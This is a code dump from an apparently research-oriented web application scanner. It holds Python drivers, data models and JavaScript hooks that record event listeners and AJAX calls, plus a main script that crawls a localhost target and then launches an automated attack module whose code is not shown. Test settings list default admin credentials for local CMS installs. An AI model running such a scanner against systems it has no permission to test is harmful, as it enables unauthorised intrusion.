44 | user = User("Test42", 0, "http://localhost:8080/", login_data = {"user": "admin", "password": "admin"}, session="ABC")
45 | #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"})
46 | #user = User("Gallery2", 0, "http://localhost:8080/", login_data= {"name": "admin", "password": "34edbc"}, session= "ABC")
47 | #user = User("Gallery41", 0, session="ABC")
48 | #user = User("PHPbb64", 0, "http://localhost:8080/phpbb/ucp.php?mode=login", login_data = {"username": "admin", "password": "adminadmin"}, session= "ABC")
49 | #user = User("Joomla", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"}, session= "ABC")
50 | #user = User("ModX", 0 , "http://localhost:8080/manager/", login_data= {"username": "admin", "password": "adminadmin"}, session="ABC")
51 | #user = User("Pimcore", 0, "http://localhost:8080/admin/login/", login_data={"username": "admin", "password": "admin"}, session="ABC")
52 | #user = User("Piwigo", 0, "http://localhost:8080/", login_data={"username": "admin", "password": "admin"}, session="ABC")
53 | #user = User("Concret5", 0, "http://localhost:8080/index.php/login", login_data={"uName": "admin", "uPassword": "admin"})
54 | #user = User("Mediawiki", 0)
55 | #user = User("MyBB2", 0, "http://localhost:8080/index.php", login_data= {"quick_username": "admin", "quick_password": "admin"}, session="ABC")
56 | #user = User("MyBB2", 0, "http://localhost:8080/admin/index.php", login_data= {"username": "admin", "password": "admin"}, session="ABC")
57 | #user = User("local", 0)
58 |
59 | url = "http://localhost:8080/"
60 | crawler_config = CrawlConfig("Database Name", url, max_depth=2, max_click_depth=5, crawl_speed=CrawlSpeed.Fast)
61 | attack_config = AttackConfig(url)
62 |
63 | database_manager = DatabaseManager(user, dropping=True)
64 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
65 | crawler.crawl(user)
66 | # TODO: It seems to be that, there is an error if we instanciate crawler and attacker and then call the crawl function. Maybe use one global app!
67 | logging.info("Crawler finished")
68 | logging.info("Start attacking...")
69 | #attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
70 | #attacker.attack(user)
71 | logging.info("Finish attacking...")
72 |
--------------------------------------------------------------------------------
/crawler/js/addeventlistener_wrapper.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 |
19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery
20 | callbackWrap(Element.prototype, "addEventListener", 1, addEventListenerWrapper);
21 | callbackWrap(Document.prototype, "addEventListener", 1,
22 | bodyAddEventListenerWrapper);
--------------------------------------------------------------------------------
/crawler/js/ajax_interceptor.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 | // This js wrapps the open function from XMLHttpRequest
19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen);
20 | callInterceptionWrapper(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend);
--------------------------------------------------------------------------------
/crawler/js/ajax_observer.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 | // This js wrapps the open function from XMLHttpRequest
19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen);
20 | callbackWrap(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend);
--------------------------------------------------------------------------------
/crawler/js/lib.js:
--------------------------------------------------------------------------------
1 | /*
2 | * Simulate.js from https://github.com/airportyh/simulate.js
3 | */
4 | !function() {
5 | function extend(dst, src) {
6 | for ( var key in src)
7 | dst[key] = src[key]
8 | return src
9 | }
10 | var Simulate = {
11 | event : function(element, eventName) {
12 | if (document.createEvent) {
13 | var evt = document.createEvent("HTMLEvents")
14 | evt.initEvent(eventName, true, true)
15 | element.dispatchEvent(evt)
16 | } else {
17 | var evt = document.createEventObject()
18 | element.fireEvent('on' + eventName, evt)
19 | }
20 | },
21 | keyEvent : function(element, type, options) {
22 | var evt, e = {
23 | bubbles : true,
24 | cancelable : true,
25 | view : window,
26 | ctrlKey : false,
27 | altKey : false,
28 | shiftKey : false,
29 | metaKey : false,
30 | keyCode : 0,
31 | charCode : 0
32 | }
33 | extend(e, options)
34 | if (document.createEvent) {
35 | try {
36 | evt = document.createEvent('KeyEvents')
37 | evt.initKeyEvent(type, e.bubbles, e.cancelable, e.view,
38 | e.ctrlKey, e.altKey, e.shiftKey, e.metaKey,
39 | e.keyCode, e.charCode)
40 | element.dispatchEvent(evt)
41 | } catch (err) {
42 | evt = document.createEvent("Events")
43 | evt.initEvent(type, e.bubbles, e.cancelable)
44 | extend(evt, {
45 | view : e.view,
46 | ctrlKey : e.ctrlKey,
47 | altKey : e.altKey,
48 | shiftKey : e.shiftKey,
49 | metaKey : e.metaKey,
50 | keyCode : e.keyCode,
51 | charCode : e.charCode
52 | })
53 | element.dispatchEvent(evt)
54 | }
55 | }
56 | }
57 | }
58 | Simulate.keypress = function(element, chr) {
59 | var charCode = chr.charCodeAt(0)
60 | this.keyEvent(element, 'keypress', {
61 | keyCode : charCode,
62 | charCode : charCode
63 | })
64 | }
65 | Simulate.keydown = function(element, chr) {
66 | var charCode = chr.charCodeAt(0)
67 | this.keyEvent(element, 'keydown', {
68 | keyCode : charCode,
69 | charCode : charCode
70 | })
71 | }
72 | Simulate.keyup = function(element, chr) {
73 | var charCode = chr.charCodeAt(0)
74 | this.keyEvent(element, 'keyup', {
75 | keyCode : charCode,
76 | charCode : charCode
77 | })
78 | }
79 | Simulate.change = function(element) {
80 | var evt = document.createEvent("HTMLEvents");
81 | evt.initEvent("change", false, true);
82 | element.dispatchEvent(evt);
83 |
84 | }
85 | //Simulate.click = function(element){
86 | // element.click();
87 | //}
88 | var events = ['click','focus', 'blur', 'dblclick', 'input', 'mousedown',
89 | 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize',
90 | 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave' ]
91 | for (var i = events.length; i--;) {
92 | var event = events[i]
93 | Simulate[event] = (function(evt) {
94 | return function(element) {
95 | this.event(element, evt)
96 | }
97 | }(event))
98 | }
99 | if (typeof module !== 'undefined') {
100 | module.exports = Simulate
101 | } else if (typeof window !== 'undefined') {
102 | window.Simulate = Simulate
103 | } else if (typeof define !== 'undefined') {
104 | define(function() {
105 | return Simulate
106 | })
107 | }
108 | }();
109 | /*
110 | * From down here
111 | *
112 | *Copyright (C) 2015 Constantin Tschuertz
113 | *
114 | * This program is free software: you can redistribute it and/or modify
115 | * it under the terms of the GNU General Public License as published by
116 | * the Free Software Foundation, either version 3 of the License, or
117 | * any later version.
118 | *
119 | *This program is distributed in the hope that it will be useful,
120 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
121 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
122 | * GNU General Public License for more details.
123 | *
124 | * You should have received a copy of the GNU General Public License
125 | * along with this program. If not, see .
126 | *
127 | */
128 |
129 |
130 | function callbackWrap(object, property, argumentIndex, wrapperFactory) {
131 | var original = object[property];
132 | object[property] = function() {
133 | wrapperFactory(this, arguments);
134 | return original.apply(this, arguments);
135 | }
136 | return original;
137 | }
138 |
139 | var max_waiting_time = 65000
140 | var min_waiting_time = 0
141 |
142 | function timingCallbackWrap(object, property, argumentIndex, wrapperFactory) {
143 | var original = object[property];
144 |
145 | object[property] = function() {
146 | if (arguments[1] > max_waiting_time) {
147 | arguments[1] = max_waiting_time
148 | }
149 | wrapperFactory(this, arguments);
150 | return original.apply(this, arguments);
151 | }
152 | return original;
153 | }
154 |
155 | function callInterceptionWrapper(object, property, argumentIndex,
156 | wrapperFactory) {
157 | var original = object[property];
158 | object[property] = function() {
159 | wrapperFactory(this, arguments);
160 | return null;
161 | }
162 | return original;
163 | }
164 |
165 | function XMLHTTPObserverOpen(elem, args) {
166 | resp = {
167 | "url" : args[1],
168 | "method" : args[0]
169 | };
170 | random_num = Math.floor((Math.random() * 10000) + 1);
171 | //console.log("Uniq Id set: " + random_num);
172 | elem.jaeks_id = random_num;
173 | resp = JSON.stringify(resp);
174 | jswrapper.xmlHTTPRequestOpen(resp)
175 | }
176 |
177 | function XMLHTTPObserverSend(elem, args) {
178 | elems = []
179 | for (i = 0; i < args.length; i++) {
180 | elems.push(args[i])
181 | }
182 | resp = {
183 | "parameters" : elems
184 | };
185 | //console.log("Uniq Id: " + elem.jaeks_id);
186 | resp = JSON.stringify(resp)
187 | jswrapper.xmlHTTPRequestSend(resp)
188 | }
189 |
190 | function timeoutWrapper(elem, args) {
191 | function_id = MD5(args[0].toString());
192 | resp = {
193 | "function_id" : function_id,
194 | "time" : args[1]
195 | };
196 | resp = JSON.stringify(resp)
197 | jswrapper.timeout(resp)
198 | }
199 |
200 | function intervallWrapper(elem, args) {
201 | function_id = MD5(args[0].toString());
202 | resp = {
203 | "function_id" : function_id,
204 | "time" : args[1]
205 | };
206 | resp = JSON.stringify(resp)
207 | jswrapper.intervall(resp)
208 | }
209 |
210 | function getXPath(element) {
211 | try {
212 | var xpath = '';
213 | for (; element && element.nodeType == 1; element = element.parentNode) {
214 | var sibblings = element.parentNode.childNodes;
215 | var same_tags = []
216 | for (var i = 0; i < sibblings.length; i++) { // collecting same
217 | if (element.tagName === sibblings[i].tagName) {
218 | same_tags[same_tags.length] = sibblings[i]
219 | }
220 | }
221 |
222 | var id = same_tags.indexOf(element) + 1;
223 | id > 1 ? (id = '[' + id + ']') : (id = '');
224 | xpath = '/' + element.tagName.toLowerCase() + id + xpath;
225 | }
226 | return xpath;
227 | } catch (e) {
228 | console.log("Error: " + e)
229 | return "";
230 | }
231 | }
232 |
233 | function addEventListenerWrapper(elem, args) {
234 | tag = elem.tagName
235 | dom_adress = "";
236 | id = elem.id;
237 | html_class = elem.className;
238 | //console.log("AddEventLIstenerWrapper: " + tag + " - Event: " + args[0])
239 | dom_adress = getXPath(elem);
240 | if (dom_adress.indexOf("/html/body") == -1) {
241 | console.log("Domadress is not valid: " + dom_adress)
242 | return
243 | }
244 | function_id = MD5(args[1].toString())
245 | resp = {
246 | "event" : args[0],
247 | "function_id" : function_id,
248 | "addr" : dom_adress,
249 | "id" : id,
250 | "tag" : tag,
251 | "class" : html_class
252 | }
253 | //console.log(resp)
254 | resp = JSON.stringify(resp)
255 | jswrapper.add_eventListener_to_element(resp)
256 | if (args[0] == "change") {
257 | inputs = elem.querySelectorAll("input");
258 | selects = elem.querySelectorAll("select");
259 | options = elem.querySelectorAll("option");
260 |
261 | for (i = 0; i < inputs.length; i++) {
262 | e = inputs[i];
263 | if (e.getAttribute("type") == "radio"
264 | || e.getAttribute("type") == "checkbox") {
265 | tag = e.tagName
266 | id = e.id;
267 | html_class = e.className;
268 | dom_adress = getXPath(e);
269 | function_id = "";
270 | resp = {
271 | "event" : "change",
272 | "function_id" : function_id,
273 | "addr" : dom_adress,
274 | "id" : id,
275 | "tag" : tag,
276 | "class" : html_class
277 | }
278 | resp = JSON.stringify(resp)
279 | jswrapper.add_eventListener_to_element(resp)
280 | }
281 | }
282 | for (i = 0; i < selects.length; i++) {
283 | s = selects[i];
284 | tag = s.tagName
285 | id = s.id;
286 | html_class = s.className;
287 | dom_adress = getXPath(s);
288 | function_id = "";
289 | resp = {
290 | "event" : "change",
291 | "function_id" : function_id,
292 | "addr" : dom_adress,
293 | "id" : id,
294 | "tag" : tag,
295 | "class" : html_class
296 | }
297 | resp = JSON.stringify(resp)
298 | jswrapper.add_eventListener_to_element(resp)
299 | }
300 | for (xx = 0; xx < options.length; xx++) {
301 | element = options[i]
302 | tag = element.tagName
303 | id = element.id;
304 | html_class = element.className;
305 | dom_adress = getXPath(element);
306 | function_id = "";
307 | resp = {
308 | "event" : "change",
309 | "function_id" : function_id,
310 | "addr" : dom_adress,
311 | "id" : id,
312 | "tag" : tag,
313 | "class" : html_class
314 | }
315 | resp = JSON.stringify(resp)
316 | jswrapper.add_eventListener_to_element(resp)
317 | }
318 | }
319 | if (tag == "TABLE" && args[0] == "click"){
320 | candidates = elem.querySelectorAll("button");
321 | for( xx = 0; xx < candidates.length; xx++) {
322 | var element = candidates[xx];
323 | tag = element.tagName;
324 | id = element.id;
325 | html_class = element.className;
326 | dom_adress = getXPath(element);
327 | function_id = "";
328 | resp = {
329 | "event": "click",
330 | "function_id": function_id,
331 | "addr": dom_adress,
332 | "id": id,
333 | "tag": tag,
334 | "class": html_class
335 | };
336 | resp = JSON.stringify(resp);
337 | //console.log("Hello " + resp)
338 | //console.log(element.click)
339 | jswrapper.add_eventListener_to_element(resp);
340 | };
341 | }
342 | }
343 |
344 | function bodyAddEventListenerWrapper(elem, args) {
345 | tag = "body"
346 | dom_adress = "";
347 | id = elem.id;
348 | html_class = elem.className;
349 | function_id = MD5(args[1].toString())
350 | dom_adress = "/html/body"
351 | resp = {
352 | "event" : args[0],
353 | "function_id" : function_id,
354 | "addr" : dom_adress,
355 | "id" : id,
356 | "tag" : tag,
357 | "class" : html_class
358 | }
359 | resp = JSON.stringify(resp)
360 | jswrapper.add_eventListener_to_element(resp)
361 |
362 | }
363 |
364 |
--------------------------------------------------------------------------------
/crawler/js/property_obs.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 |
19 | function catch_properties(){
20 | var elems = document.getElementsByTagName('*')
21 | // console.log(elems.length + " elems found...")
22 | for (my_counter_i = 0; my_counter_i < elems.length; my_counter_i++) {
23 | events = []
24 | tag = elems[my_counter_i].tagName
25 | dom_address = ""
26 | id = elems[my_counter_i].id
27 | if (elems[my_counter_i].onclick != null) {
28 | events.push({"method": "onclick", "func": elems[my_counter_i].onclick})
29 | }
30 | if (elems[my_counter_i].onmouseover != null) {
31 | events.push({"method": "onmouseover", "func": elems[my_counter_i].onmouseover})
32 | }
33 | if (elems[my_counter_i].onabort != null) {
34 | events.push({"method": "onabort", "func": elems[my_counter_i].onabort})
35 | }
36 | if (elems[my_counter_i].onblur != null) {
37 | events.push({"method": "onblur", "func": elems[my_counter_i].onblur})
38 | }
39 | if (elems[my_counter_i].onchange != null) {
40 | events.push({"method": "onchange", "func": elems[my_counter_i].onchange})
41 | }
42 | if (elems[my_counter_i].onblclick != null) {
43 | events.push({"method": "onblclick", "func": elems[my_counter_i].onblclick})
44 | }
45 | if (elems[my_counter_i].onerror != null) {
46 | events.push({"method": "onerror", "func": elems[my_counter_i].onerror})
47 | }
48 | if (elems[my_counter_i].onfocus != null) {
49 | events.push({"method": "onfocus", "func": elems[my_counter_i].onfocus})
50 | }
51 | if (elems[my_counter_i].onkeydown != null) {
52 | events.push({"method": "onkeydown", "func": elems[my_counter_i].onkeydown})
53 | }
54 | if (elems[my_counter_i].onkeypress != null) {
55 | events.push({"method": "onkeypress", "func": elems[my_counter_i].onkeypress})
56 | }
57 | if (elems[my_counter_i].onkeyup != null) {
58 | events.push({"method": "onkeyup", "func": elems[my_counter_i].onkeyup})
59 | }
60 | if (elems[my_counter_i].onmousedown != null) {
61 | events.push({"method": "onmousedown", "func": elems[my_counter_i].onmousedown})
62 | }
63 | if (elems[my_counter_i].onmousemove != null) {
64 | events.push({"method": "onmousemove", "func": elems[my_counter_i].onmousemove})
65 | }
66 | if (elems[my_counter_i].onmouseout != null) {
67 | events.push({"method": "onmouseout", "func": elems[my_counter_i].onmouseout})
68 | }
69 | if (elems[my_counter_i].onmouseup != null) {
70 | events.push({"method": "onmouseup", "func": elems[my_counter_i].onmouseup})
71 | }
72 | //console.log("We have: " + events.length + " events");
73 | if (events.length > 0) {
74 | elem = elems[my_counter_i]
75 | dom_adress = getXPath(elem);
76 | html_class = elems[my_counter_i].className;
77 | for (my_counter_j = 0; my_counter_j < events.length; my_counter_j++) {
78 | function_id = MD5(events[my_counter_j].func.toString())
79 | f = events[my_counter_j].func.toString()
80 | e = events[my_counter_j].event_type
81 | //clickable = JSON.parse(events[j])
82 | tut1 = events[my_counter_j];
83 | resp = {
84 | "function_id" : function_id,
85 | "event" : events[my_counter_j].method,
86 | "id" : id,
87 | "tag" : tag,
88 | "addr" : dom_adress,
89 | "class" : html_class
90 | }
91 | resp = JSON.stringify(resp);
92 | jswrapper.add_eventlistener_to_element(resp)
93 | }
94 | }
95 |
96 | }
97 | }
98 |
99 | catch_properties();
--------------------------------------------------------------------------------
/crawler/js/timing_wrapper.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 |
19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery
20 | timingCallbackWrap(window, "setTimeout", 0, timeoutWrapper);
21 | timingCallbackWrap(window, "setInterval", 0, intervallWrapper);
--------------------------------------------------------------------------------
/crawler/main.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import logging
20 |
21 | from attacker import Attacker
22 | from crawler import Crawler
23 | from database.databasemanager import DatabaseManager
24 | from utils.config import CrawlConfig, AttackConfig
25 | from models.utils import CrawlSpeed
26 | from utils.user import User
27 | import csv
28 | from utils.utils import calculate_similarity_between_pages
29 |
30 | # Here you can specify the logging. Now it logs to the console. If you uncomment the two lines below, then it logs in the file.
31 | logging.basicConfig(level=logging.DEBUG,
32 | format='%(asctime)s: %(levelname)s - %(message)s',
33 | #filename='Attack.log',
34 | #filemode='w'
35 | )
36 |
37 | if __name__ == '__main__':
38 |
39 |
40 | # In the Userobject, the first string you set is the name of the crawl run and also the name of the created database.
41 | # So if you want to keep old runs then just give different names for each crawl
42 |
43 |
44 | # The first of the line below, starts a scan with a logged in user.
45 | # Parameter desc: Name of DB - Privilege level: deprecated(Just let it 0) - URL where the login form is stored - login data as dict. The key is the parameter name in the login form that has to be set -
46 | # session: reflects the session within a DB. It is deprecated. Just set it to ABC
47 | #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
48 |
49 |
50 | # Crawl without user session. Parameter desc: Name of DB - Privilege level - session
51 | user = User("Test", 0, session="ABC")
52 |
53 | url = "http://localhost/"
54 | # Creates the crawler config: URL: start url of the crawler(independent from login) - max_dept: how deep to crawl(link), max_click_depth: how deep to follow events - Crawlspeed: Fast is the best value here
55 | crawler_config = CrawlConfig("Some Name, doesn't matter", url, max_depth=1, max_click_depth=2, crawl_speed=CrawlSpeed.Fast)
56 |
57 | # From here you have nothing to chance. Except you want no attacking, then comment out the lines down
58 | logging.info("Crawler started...")
59 | database_manager = DatabaseManager(user, dropping=True)
60 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
61 | crawler.crawl(user)
62 | logging.info("Crawler finished")
63 |
64 | # If you want no attacking comment out the lines below.
65 | logging.info("Start attacking...")
66 | attack_config = AttackConfig(url)
67 | attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
68 | attacker.attack(user)
69 | logging.info("Finish attacking...")
--------------------------------------------------------------------------------
/crawler/models/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
--------------------------------------------------------------------------------
/crawler/models/ajaxrequest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import hashlib
19 | from models.asyncrequests import AsyncRequests
20 |
21 |
22 | class AjaxRequest(AsyncRequests):
23 | '''
24 | Models an Ajax-Request issued by an event
25 | '''
26 | def __init__(self, method, url, trigger, parameters=None):
27 | super(AjaxRequest, self).__init__(method, url, parameters)
28 | self.trigger = trigger
29 |
30 | def toString(self):
31 | msg = "[Ajax - Methode: " + self.method + " - Url: "+ self.url.toString() + " - Trigger: " + self.trigger.toString() + " \n"
32 | for param_pair in self.parameters if self.parameters is not None else []:
33 | msg += " - Parameter pair: " + str(param_pair)
34 | return msg
35 |
36 | def __eq__(self, other):
37 | if not isinstance(other, self.__class__):
38 | return False
39 | try:
40 | url = self.url.complete_url
41 | except AttributeError:
42 | url = self.url
43 | try:
44 | o_url = other.url.complete_url
45 | except AttributeError:
46 | o_url = other.url
47 |
48 | return self.method == other.method and url == o_url and self.trigger == other.trigger
49 |
50 | def __neg__(self):
51 | return not self.__eq__()
52 |
53 |
--------------------------------------------------------------------------------
/crawler/models/asyncrequests.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import hashlib
20 | class AsyncRequests():
21 |
22 | def __init__(self, method, url, parameters=None):
23 | self.method = method
24 | self.url = url
25 | self.request_structure = None
26 | self.structure = None
27 |
28 | self.parameters = parameters
29 | if not isinstance(self.parameters, dict) and self.parameters is not None:
30 | self.handle_parameters()
31 |
32 | @property
33 | def request_hash(self):
34 | try:
35 | return self.get_hash()
36 | except AttributeError:
37 | raise AttributeError("You need first to analyze url")
38 |
39 |
40 | def handle_parameters(self):
41 | try:
42 | key_value_pairs = self.parameters.split("&")
43 | tmp = {}
44 | for key_value_pair in key_value_pairs:
45 | try:
46 | key, value = key_value_pair.split("=")
47 | except ValueError:
48 | continue
49 | tmp[key] = value
50 | tmp = sorted(tmp.items())
51 | self.parameters = {}
52 | for key, val in tmp:
53 | self.parameters[key] = val
54 | except AttributeError:
55 | self.parameters = None
56 |
57 | def get_hash(self):
58 | s_to_hash = self.url.abstract_url + "+" + self.method
59 | try:
60 | for k in [x[0] for x in self.parameters]:
61 | s_to_hash += "++" + k
62 | except TypeError:
63 | pass
64 | b_to_hash = s_to_hash.encode("utf-8")
65 | d = hashlib.md5()
66 | d.update(b_to_hash)
67 | return d.hexdigest()
--------------------------------------------------------------------------------
/crawler/models/asyncrequeststructure.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | class AsyncRequestStructure():
19 |
20 | def __init__(self, structure_hash, parameters= None):
21 | self.structure_hash = structure_hash
22 | self.parameters = parameters
--------------------------------------------------------------------------------
/crawler/models/clickable.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import hashlib
19 | from models.clickabletype import ClickableType
20 |
21 |
22 | class Clickable():
23 | '''
24 | Models interesting element with events as attributes
25 | '''
26 |
27 | def __init__(self, event, tag, dom_address, id = None, html_class = None, clickable_depth = None, function_id = None):
28 | self.event = event
29 | self.tag = tag
30 | self.dom_address = dom_address
31 | self.id = id
32 | self.html_class = html_class
33 | self.links_to = None
34 | self.clicked = False
35 | self.clickable_type = None
36 | self.clickable_depth = clickable_depth
37 | self.function_id = function_id
38 |
39 | def toString(self):
40 | msg = ""
41 | msg += "[TAG: " + self.tag
42 | if self.id is not None and not self.id == "":
43 | msg += " - ID: " + self.id
44 | if self.event is not None and not self.event == "":
45 | msg += " - Event: " + self.event
46 | if self.html_class is not None and not self.html_class == "":
47 | msg += " - Class: " + self.html_class
48 | msg += " - Domaddress: " + self.dom_address
49 | if self.links_to is not None:
50 | msg += " - Links to: " + self.links_to
51 | if self.clickable_depth is not None:
52 | msg += " - Clickable Depth: " + str(self.clickable_depth)
53 | if self.function_id is not None:
54 | msg += " - FunctionID: " + self.function_id
55 | if self.clickable_type is not None:
56 | if self.clickable_type == ClickableType.CreatesNewNavigatables:
57 | msg += " - ClickableType: CreateNewNavigatable"
58 | elif self.clickable_type == ClickableType.Link:
59 | msg += " - ClickableType: Link"
60 | elif self.clickable_type == ClickableType.SendingAjax:
61 | msg += " - ClickableType: SendingAjax"
62 | elif self.clickable_type == ClickableType.UIChange:
63 | msg += " - ClickableType: UiChange"
64 | elif self.clickable_type == ClickableType.Error:
65 | msg += " - ClickableType: Error"
66 | elif self.clickable_type == ClickableType.IgnoredByCrawler:
67 | msg += " - ClickableType: IgnoredByCrawler"
68 | elif self.clickable_type == ClickableType.UnsupportedEvent:
69 | msg += " - ClickableType: UnsupportedEvent"
70 | else:
71 | msg += " - ClickableType: Unknown"
72 | msg += "]"
73 | return msg
74 |
75 | def __eq__(self, other):
76 | if not isinstance(other, self.__class__):
77 | return False
78 | if self.clickable_type is not None and other.clickable_type is not None:
79 | return self.dom_address == other.dom_address and self.event == other.event and self.clickable_type == other.clickable_type and self.links_to == other.links_to
80 | else:
81 | return self.dom_address == other.dom_address and self.event == other.event and self.links_to == other.links_to
82 |
83 | def __hash__(self):
84 | s_to_hash = self.toString()
85 | return hash(s_to_hash)
86 |
87 |
88 | def __ne__(self, other):
89 | return not self.__eq__(other)
90 |
91 | def similar(self, other):
92 | if not isinstance(other, self.__class__):
93 | return False
94 | if self == other:
95 | return True
